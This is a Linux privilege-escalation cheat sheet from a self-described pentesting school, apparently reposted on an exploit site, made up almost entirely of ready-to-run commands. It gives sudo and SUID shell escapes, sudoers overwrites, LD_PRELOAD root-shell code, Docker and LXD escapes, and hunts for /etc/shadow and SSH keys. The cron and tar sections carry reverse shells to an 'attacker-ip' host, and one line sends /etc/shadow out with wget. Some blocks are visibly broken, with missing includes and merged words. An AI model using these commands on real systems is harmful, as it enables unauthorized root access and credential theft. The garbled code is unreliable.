Share
## https://sploitus.com/exploit?id=400910D4-2275-5838-8B06-6A1687B364FC
# ๐Ÿ”ฅ Cyber Public School โ€“ Linux Privilege Escalation Ultra Guide

Advanced Enumeration | Sudo Abuse | SUID | Capabilities | Cron | Kernel | Docker | NFS | LXD | Wildcard | PATH | LD_PRELOAD | SSH | Password Hunting

Maintained by: Cyber Public School  
Level: OSCP | Red Team | Real-World Pentesting  

---
๐Ÿ› ๏ธ Must-Have Linux Privilege Escalation Tools (with Links)

๐Ÿ“Œ 1๏ธโƒฃ LinPEAS (Linux Privilege Escalation Awesome Script)

Automated enumeration script for privilege escalation.

๐Ÿ‘‰ https://github.com/carlospolop/PEASS-ng/releases/latest

๐Ÿ“Œ 2๏ธโƒฃ pspy (Process Snooper for Priv Esc)

Shows processes/cron activities without root.

๐Ÿ‘‰ https://github.com/DominicBreuker/pspy

๐Ÿ“Œ 3๏ธโƒฃ Linux Exploit Suggester

Suggests possible kernel exploits based on version.

๐Ÿ‘‰ https://github.com/mzet-/linux-exploit-suggester

# 1๏ธโƒฃ BASIC ENUMERATION

## System Info
```bash
whoami
id
groups
hostname
uname -a
uname -r
arch
cat /etc/issue
cat /etc/os-release
lsb_release -a
```

## Process Enumeration
```bash
ps aux
ps -ef
top
htop
pstree
```

## Network Enumeration
```bash
ip a
ifconfig
route -n
netstat -tulpn
ss -tulpn
arp -a

๐Ÿ” Network Interfaces & IP Info
baship a
ip addr show
ifconfig -a
cat /etc/network/interfaces
hostname -I

๐ŸŒ Routing & ARP
baship route
route -n
arp -a
ip neigh
cat /etc/hosts

๐Ÿ”— Active Connections & Open Ports
bashss -tulnp
netstat -tulnp
netstat -antp
ss -anp
lsof -i

๐Ÿ”ฅ Firewall Rules
bashiptables -L -v -n
iptables -t nat -L
cat /etc/iptables/rules.v4
ufw status verbose
nft list ruleset

๐Ÿ“ก DNS & Name Resolution
bashcat /etc/resolv.conf
cat /etc/hosts
nslookup localhost
dig @ -x 

๐Ÿ” Network Services & Credentials
bash# Find network config files with credentials
grep -r "password" /etc/network/ 2>/dev/null
find / -name "*.conf" | xargs grep -l "password" 2>/dev/null

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/known_hosts
๐Ÿ“ NFS Shares
bashshowmount -e 
cat /etc/exports
mount | grep nfs

๐Ÿ“‹ Useful Files to Check
bashcat /etc/hosts.allow
cat /etc/hosts.deny
cat /proc/net/tcp       # Active TCP connections (hex format)
cat /proc/net/udp
cat /proc/net/arp
```

## Environment Variables
```bash
env
printenv
echo $PATH
echo $USER
```

---

# 2๏ธโƒฃ USER ENUMERATION

```bash
cat /etc/passwd
cat /etc/shadow
getent passwd
getent group
last
lastlog
```

## Check for Password Reuse
```bash
grep -i password *
history
cat ~/.bash_history
```

---

# 3๏ธโƒฃ SUDO ABUSE

```bash

๐Ÿ” Basic sudo Enumeration
bashsudo -l                    # Current user ke sudo permissions
sudo -ll                   # Detailed format
sudo -l -U       # Specific user ke permissions
sudo -V                    # Sudo version (vulnerability check)
----------------------------------------------------------------------
๐Ÿ“ Sudo Config Files
bashcat /etc/sudoers
cat /etc/sudoers.d/*
ls -la /etc/sudoers.d/
visudo -c                  # Config syntax check
------------------------------------------------------------------------
โšก Common sudo -l Outputs & Exploitation
1๏ธโƒฃ ALL Permissions (Full Root)
bash# Output:
# (ALL : ALL) ALL

sudo su
sudo bash
sudo sh
sudo -s
sudo passwd root

2๏ธโƒฃ NOPASSWD - Password ke bina root
bash# Output:
# (ALL) NOPASSWD: ALL

sudo su -
sudo bash
sudo /bin/bash

๐Ÿ› ๏ธ GTFOBins - Binary Exploitation
๐Ÿ“ Text Editors
bash# vim
sudo vim -c ':!/bin/bash'
sudo vim -c ':!sh'

# nano
sudo nano
# Ctrl+R โ†’ Ctrl+X โ†’ reset; sh 1>&0 2>&0

# less
sudo less /etc/passwd
# ! โ†’ !/bin/bash

# more
sudo more /etc/passwd
# !/bin/bash

# vi
sudo vi -c ':!/bin/sh'
-----------------------------------------------------------------
๐Ÿ Scripting Languages
bash
# Python
sudo python -c 'import os; os.system("/bin/bash")'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo python -c 'import pty; pty.spawn("/bin/bash")'

# Perl
sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/sh";'

# Ruby
sudo ruby -e 'exec "/bin/bash"'

# PHP
sudo php -r 'system("/bin/bash");'
sudo php -r 'passthru("/bin/bash");'

# Lua
sudo lua -e 'os.execute("/bin/bash")'

# Node.js
sudo node -e 'require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})'

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# Tcl
sudo tclsh
exec /bin/bash @stdout 2>@stderr
-----------------------------------------------------------------------
๐Ÿ“ฆ File Operations
bash# cp (passwd file overwrite)
sudo cp /bin/bash /tmp/rootbash
sudo chmod +s /tmp/rootbash
/tmp/rootbash -p

# mv
sudo mv /etc/sudoers /tmp/
# (sudoers remove karke bypass)

# dd
echo "user ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers

# tee
echo "user ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers

# cat
sudo cat /etc/shadow
sudo cat /root/.ssh/id_rsa

๐ŸŒ Network Tools
bash# curl
sudo curl file:///etc/shadow
sudo curl -o /etc/sudoers http:///sudoers

# wget
sudo wget http:///shell.sh -O /tmp/shell.sh
sudo wget --post-file=/etc/shadow http:///

# nmap (older versions)
sudo nmap --interactive
# nmap> !sh

# nmap script
echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
---------------------------------------------------------------------------
๐Ÿ—œ๏ธ Archive Tools
bash# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

# zip
sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

# 7z
sudo 7z a /tmp/test.7z /tmp/test -r
---------------------------------------------------------------------------
โš™๏ธ System Binaries
bash# find
sudo find / -exec /bin/bash \;
sudo find /tmp -exec bash -i \;

# bash
sudo bash
sudo bash -p

# ash/sh/dash/ksh/zsh
sudo ash
sudo sh
sudo dash
sudo zsh

# env
sudo env /bin/bash

# strace
sudo strace -o /dev/null /bin/bash

# xargs
echo /bin/bash | sudo xargs -L1

# time
sudo time /bin/bash

# watch
sudo watch -x bash -c 'reset; exec bash 1>&0 2>&0'
---------------------------------------------------------
๐Ÿ“Š Editors & Viewers
bash# man
sudo man man
# !/bin/bash

# git
sudo git help config
# !/bin/bash

sudo git -p help
# !/bin/bash

# ftp
sudo ftp
# ! /bin/bash

# mysql
sudo mysql -e '\! /bin/bash'

# sqlite3
sudo sqlite3 /dev/null '.shell /bin/sh'
-------------------------------------------------------------
๐Ÿ”’ Sudo with Specific Binary Path
bash# Agar output ho:
# (root) NOPASSWD: /usr/bin/python3 /opt/script.py

# Check karo script writable hai kya
ls -la /opt/script.py
echo 'import os; os.system("/bin/bash")' >> /opt/script.py
sudo /usr/bin/python3 /opt/script.py

๐ŸŒ Environment Variables Abuse
bash# sudo -l mein dekho:
# env_keep+=LD_PRELOAD ya env_keep+=PYTHONPATH

# LD_PRELOAD Exploit
cat > /tmp/shell.c 
#include 
#include 
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0); setgid(0);
    system("/bin/bash");
}
EOF

gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so 


# PYTHONPATH Exploit
mkdir /tmp/pylib
cat > /tmp/pylib/os.py          # Non-interactive

# /proc se sudo token steal
ls -la /proc/*/fd 2>/dev/null | grep pts
sudo -l
sudo -V
```

### Common Exploits

```bash
sudo vim -c ':!/bin/bash'
sudo nano
sudo less /etc/profile
sudo find . -exec /bin/sh \; -quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
```

---

# 4๏ธโƒฃ SUID EXPLOITATION

```bash
find / -perm -4000 -type f 2>/dev/null
```

Common SUID Abuse:

```bash
find . -exec /bin/sh -p \; -quit
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
```

---

# 5๏ธโƒฃ SGID FILES

```bash
find / -perm -2000 -type f 2>/dev/null
```

---

# 6๏ธโƒฃ WRITABLE FILES

```bash
find / -writable -type f 2>/dev/null
find / -writable -type d 2>/dev/null
```

---

# 7๏ธโƒฃ CRON JOBS

```bash
cat /etc/crontab
ls -la /etc/cron*
crontab -l

```

Exploit:
```bash
echo "/bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" >> script.sh
```
๐Ÿ” Basic Cron Enumeration
bash# Current user ke cron jobs
crontab -l

# Root ke cron jobs
crontab -l -u root
crontab -u root -l

# Sab users ke cron jobs
for user in $(cat /etc/passwd | cut -f1 -d:); do
    echo "=== $user ===";
    crontab -l -u $user 2>/dev/null;
done

๐Ÿ“ Cron Config Files
bashcat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/

# Spool directory
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*
ls -la /var/spool/cron/crontabs/

# Anacron
cat /etc/anacrontab
ls -la /var/spool/anacron/

๐Ÿ•ต๏ธ Hidden Cron Jobs Dhundna
bash# System wide cron search
grep -r "cron" /etc/ 2>/dev/null
find /etc -name "*cron*" 2>/dev/null
find /var/spool -name "*cron*" 2>/dev/null

# Cron log files
cat /var/log/cron
cat /var/log/cron.log
cat /var/log/syslog | grep cron
cat /var/log/auth.log | grep cron
grep "CRON" /var/log/syslog

โšก pspy - Hidden Cron Monitor (Best Tool)
bash# Download & Run
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

# 32-bit system ke liye
./pspy32

# Verbose mode
./pspy64 -v


# 9๏ธโƒฃ CAPABILITIES

```bash
getcap -r / 2>/dev/null
```

Exploit Python:
```bash
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

---

# ๐Ÿ”Ÿ NFS

```bash
showmount -e target-ip
mount -t nfs target-ip:/share /mnt
```

---

# 11๏ธโƒฃ DOCKER ESCAPE

```bash
docker ps
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

---

# 12๏ธโƒฃ LXD ESCAPE

```bash
lxc image list
lxc init alpine mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
```

---

# 13๏ธโƒฃ KERNEL EXPLOITS

```bash
uname -r
searchsploit linux kernel 
gcc exploit.c -o exploit
./exploit
```

---

# 14๏ธโƒฃ PASSWORD HUNTING

```bash
grep -R "password" / 2>/dev/null
grep -R "passwd" / 2>/dev/null
```

Check config files:
```bash
cat /var/www/html/config.php
cat wp-config.php
```

---

# 15๏ธโƒฃ SSH KEYS

```bash
ls -la ~/.ssh
cat ~/.ssh/id_rsa
```

---

# 16๏ธโƒฃ WILDCARD EXPLOIT

```bash
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=sh shell.sh
```

---

# 17๏ธโƒฃ LD_PRELOAD

Create exploit.c:
```c
#include 
#include 
#include 

void _init() {
    setuid(0);
    system("/bin/bash");
}
```

Compile:
```bash
gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=./exploit.so program
```

---

# 18๏ธโƒฃ TAR PRIV ESC

```bash
echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" > shell.sh
chmod +x shell.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=sh shell.sh
```

---

# 19๏ธโƒฃ AUTOMATED TOOLS

```bash
wget http://attacker-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

```bash
wget http://attacker-ip/pspy
chmod +x pspy
./pspy
```

---

# 20๏ธโƒฃ FULL ENUM WORKFLOW

1. whoami
2. sudo -l
3. SUID
4. Writable files
5. Cron
6. Capabilities
7. Docker/LXD
8. Kernel
9. Password hunting
10. Automation

---

# ๐Ÿš€ Cyber Public School

OSCP | Red Team | Real-World Pentesting  
Building Elite Ethical Hackers